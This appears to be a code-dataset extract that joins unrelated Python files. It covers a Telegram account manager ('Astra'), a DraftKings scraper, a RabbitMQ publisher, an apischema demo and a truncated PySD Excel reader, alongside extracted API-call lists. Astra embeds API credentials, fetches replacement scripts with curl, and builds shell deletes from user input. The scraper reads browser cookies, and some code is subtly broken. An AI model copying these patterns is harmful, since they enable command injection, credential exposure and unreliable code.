| [((421, 436), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (426, 436), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((932, 941), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (939, 941), False, 'from tempfile import mkdtemp\n'), ((1024, 1036), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (1031, 1036), False, 'from flask_session import Session\n'), ((1091, 1118), 'cs50.SQL', 'SQL', (['"""sqlite:///finance.db"""'], {}), "('sqlite:///finance.db')\n", (1094, 1118), False, 'from cs50 import SQL\n'), ((1154, 1179), 'os.environ.get', 'os.environ.get', (['"""API_KEY"""'], {}), "('API_KEY')\n", (1168, 1179), False, 'import os\n'), ((1316, 1331), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1323, 1331), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1446, 1461), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1453, 1461), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1568, 1583), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1575, 1583), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1697, 1712), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (1710, 1712), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2843, 2858), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (2856, 2858), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2905, 2918), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2913, 2918), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3034, 3049), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3041, 3049), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3152, 3167), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3159, 3167), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3285, 3300), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3292, 3300), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3433, 3456), 'helpers.apology', 'apology', (['e.name', 'e.code'], {}), '(e.name, e.code)\n', (3440, 3456), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2609, 2622), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2617, 2622), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2722, 2751), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (2737, 2751), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3400, 3421), 'werkzeug.exceptions.InternalServerError', 'InternalServerError', ([], {}), '()\n', (3419, 3421), False, 'from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\n'), ((1872, 1900), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (1888, 1900), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((1921, 1958), 'helpers.apology', 'apology', (['"""must provide username"""', '(403)'], {}), "('must provide username', 403)\n", (1928, 1958), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2211, 2239), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (2227, 2239), 
False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2419, 2467), 'helpers.apology', 'apology', (['"""invalid username and/or password"""', '(403)'], {}), "('invalid username and/or password', 403)\n", (2426, 2467), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2017, 2045), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2033, 2045), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2066, 2103), 'helpers.apology', 'apology', (['"""must provide password"""', '(403)'], {}), "('must provide password', 403)\n", (2073, 2103), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2369, 2397), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2385, 2397), False, 'from flask import Flask, flash, redirect, render_template, request, session\n')] |
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| [
"random.choice",
"pickle.dump",
"pickle.load",
"time.sleep",
"requests.get",
"os.system",
"colorama.init",
"telethon.sync.TelegramClient"
]
| [((179, 185), 'colorama.init', 'init', ([], {}), '()\n', (183, 185), False, 'from colorama import init, Fore\n'), ((421, 454), 'os.system', 'os.system', (['"""pip install requests"""'], {}), "('pip install requests')\n", (430, 454), False, 'import pickle, os\n'), ((1014, 1030), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (1023, 1030), False, 'import pickle, os\n'), ((1049, 1067), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (1058, 1067), False, 'import pickle, os\n'), ((1722, 1753), 'pickle.dump', 'pickle.dump', (['[parsed_number]', 'g'], {}), '([parsed_number], g)\n', (1733, 1753), False, 'import pickle, os\n'), ((2003, 2088), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{number}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{number}', 3910389,\n '86f861352f0ab76a251866059a6adbd6')\n", (2017, 2088), False, 'from telethon.sync import TelegramClient\n'), ((2649, 2657), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2654, 2657), False, 'from time import sleep\n'), ((824, 845), 'random.choice', 'random.choice', (['colors'], {}), '(colors)\n', (837, 845), False, 'import random\n'), ((2774, 2859), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{phone}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{phone}', 3910389, '86f861352f0ab76a251866059a6adbd6'\n )\n", (2788, 2859), False, 'from telethon.sync import TelegramClient\n'), ((4462, 4504), 'os.system', 'os.system', (['f"""del sessions\\\\{session_file}"""'], {}), "(f'del sessions\\\\{session_file}')\n", (4471, 4504), False, 'import pickle, os\n'), ((4531, 4571), 'os.system', 'os.system', (['f"""rm sessions/{session_file}"""'], {}), "(f'rm sessions/{session_file}')\n", (4540, 4571), False, 'import pickle, os\n'), ((4672, 4695), 'pickle.dump', 'pickle.dump', (['account', 'f'], {}), '(account, f)\n', (4683, 4695), False, 'import pickle, os\n'), ((2445, 2459), 'pickle.load', 'pickle.load', (['h'], {}), '(h)\n', (2456, 2459), False, 'import pickle, os\n'), ((5066, 5157), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt"""'], {}), "(\n 'https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')\n", (5078, 5157), False, 'import requests\n'), ((3732, 3755), 'pickle.dump', 'pickle.dump', (['[Phone]', 'k'], {}), '([Phone], k)\n', (3743, 3755), False, 'import pickle, os\n'), ((4040, 4054), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4051, 4054), False, 'import pickle, os\n'), ((5887, 5986), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py'\n )\n", (5896, 5986), False, 'import pickle, os\n'), ((5993, 6096), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py'\n )\n", (6002, 6096), False, 'import pickle, os\n'), ((5642, 5665), 'os.system', 'os.system', (['"""del add.py"""'], {}), "('del add.py')\n", (5651, 5665), False, 'import pickle, os\n'), ((5686, 5713), 'os.system', 'os.system', (['"""del manager.py"""'], {}), "('del manager.py')\n", (5695, 5713), False, 'import pickle, os\n'), ((5756, 5778), 'os.system', 'os.system', (['"""rm add.py"""'], {}), "('rm add.py')\n", (5765, 5778), False, 'import pickle, os\n'), ((5799, 5825), 
'os.system', 'os.system', (['"""rm manager.py"""'], {}), "('rm manager.py')\n", (5808, 5825), False, 'import pickle, os\n')] |
# dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
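# A minimal end-to-end sketch (illustrative only; it assumes DK_LEAGUE_KEY,
# DK_USERNAME and the Google Sheets spreadsheet key are configured, and the
# secret filename below is hypothetical):
#
#     scraper, parser = Scraper(), Parser()
#     contests = parser.historical_contests(scraper.historical_contests())
#     raw = scraper.contest_leaderboard(contests[0]['contestKey'])
#     board = parser.contest_leaderboard(raw)
#     results = {row['userName']: row['fantasyPoints'] for row in board}
#     Tracker(json_secret_fn='client_secret.json').add_week_results(1, results)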
| [
"logging.NullHandler",
"pdsheet.get_app",
"browser_cookie3.firefox",
"logging.getLogger",
"os.getenv",
"pdsheet.get_worksheet",
"requests_html.HTMLSession",
"pandas.DataFrame"
]
| [((724, 737), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (735, 737), False, 'from requests_html import HTMLSession\n'), ((1310, 1335), 'browser_cookie3.firefox', 'browser_cookie3.firefox', ([], {}), '()\n', (1333, 1335), False, 'import browser_cookie3\n'), ((4779, 4802), 'pandas.DataFrame', 'pd.DataFrame', (['container'], {}), '(container)\n', (4791, 4802), True, 'import pandas as pd\n'), ((9238, 9269), 'pdsheet.get_app', 'pdsheet.get_app', (['json_secret_fn'], {}), '(json_secret_fn)\n', (9253, 9269), False, 'import pdsheet\n'), ((10047, 10085), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10068, 10085), False, 'import pdsheet\n'), ((10701, 10739), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10722, 10739), False, 'import pdsheet\n'), ((526, 547), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (545, 547), False, 'import logging\n'), ((605, 631), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (614, 631), False, 'import os\n'), ((682, 706), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (691, 706), False, 'import os\n'), ((4496, 4517), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (4515, 4517), False, 'import logging\n'), ((4575, 4601), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (4584, 4601), False, 'import os\n'), ((4652, 4676), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (4661, 4676), False, 'import os\n'), ((9168, 9189), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (9187, 9189), False, 'import logging\n'), ((9311, 9345), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_SPREADSHEET"""'], {}), "('DK_LEAGUE_SPREADSHEET')\n", (9320, 9345), False, 'import os\n'), ((9536, 9569), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['self.sskey'], {}), '(self.sskey)\n', (9557, 9569), False, 'import pdsheet\n'), ((487, 514), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (504, 514), False, 'import logging\n'), ((4457, 4484), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4474, 4484), False, 'import logging\n'), ((9129, 9156), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (9146, 9156), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
    channel.basic_publish(exchange='posts',
                          routing_key='',
                          body='message',
                          properties=properties)
    print("send")
    connection.close()
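# A possible consumer counterpart (a sketch, not part of this script): each
# consumer binds its own exclusive queue to the 'posts' fanout exchange, so
# every connected consumer receives a copy of each published message.
#
#     channel.exchange_declare(exchange='posts', exchange_type='fanout')
#     result = channel.queue_declare(queue='', exclusive=True)
#     channel.queue_bind(exchange='posts', queue=result.method.queue)
#     channel.basic_consume(queue=result.method.queue,
#                           on_message_callback=lambda ch, mth, props, body: print(body),
#                           auto_ack=True)
#     channel.start_consuming()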
publish_fanout() | [
"pika.BasicProperties",
"pika.URLParameters",
"pika.BlockingConnection",
"os.environ.get"
]
| [((262, 303), 'os.environ.get', 'os.environ.get', (['"""CLOUDAMQP_URL"""', 'amqp_url'], {}), "('CLOUDAMQP_URL', amqp_url)\n", (276, 303), False, 'import os\n'), ((316, 339), 'pika.URLParameters', 'pika.URLParameters', (['url'], {}), '(url)\n', (334, 339), False, 'import pika\n'), ((392, 423), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (415, 423), False, 'import pika\n'), ((469, 491), 'pika.BasicProperties', 'pika.BasicProperties', ([], {}), '()\n', (489, 491), False, 'import pika\n')] |
from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| [
"apischema.json_schema.deserialization_schema",
"apischema.deserialize"
]
| [((478, 512), 'apischema.json_schema.deserialization_schema', 'deserialization_schema', (['Expression'], {}), '(Expression)\n', (500, 512), False, 'from apischema.json_schema import deserialization_schema\n'), ((625, 651), 'apischema.deserialize', 'deserialize', (['Expression', '(0)'], {}), '(Expression, 0)\n', (636, 651), False, 'from apischema import deserialize, deserializer\n'), ((655, 687), 'apischema.deserialize', 'deserialize', (['Expression', '"""1 - 1"""'], {}), "(Expression, '1 - 1')\n", (666, 687), False, 'from apischema import deserialize, deserializer\n')] |
"""
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
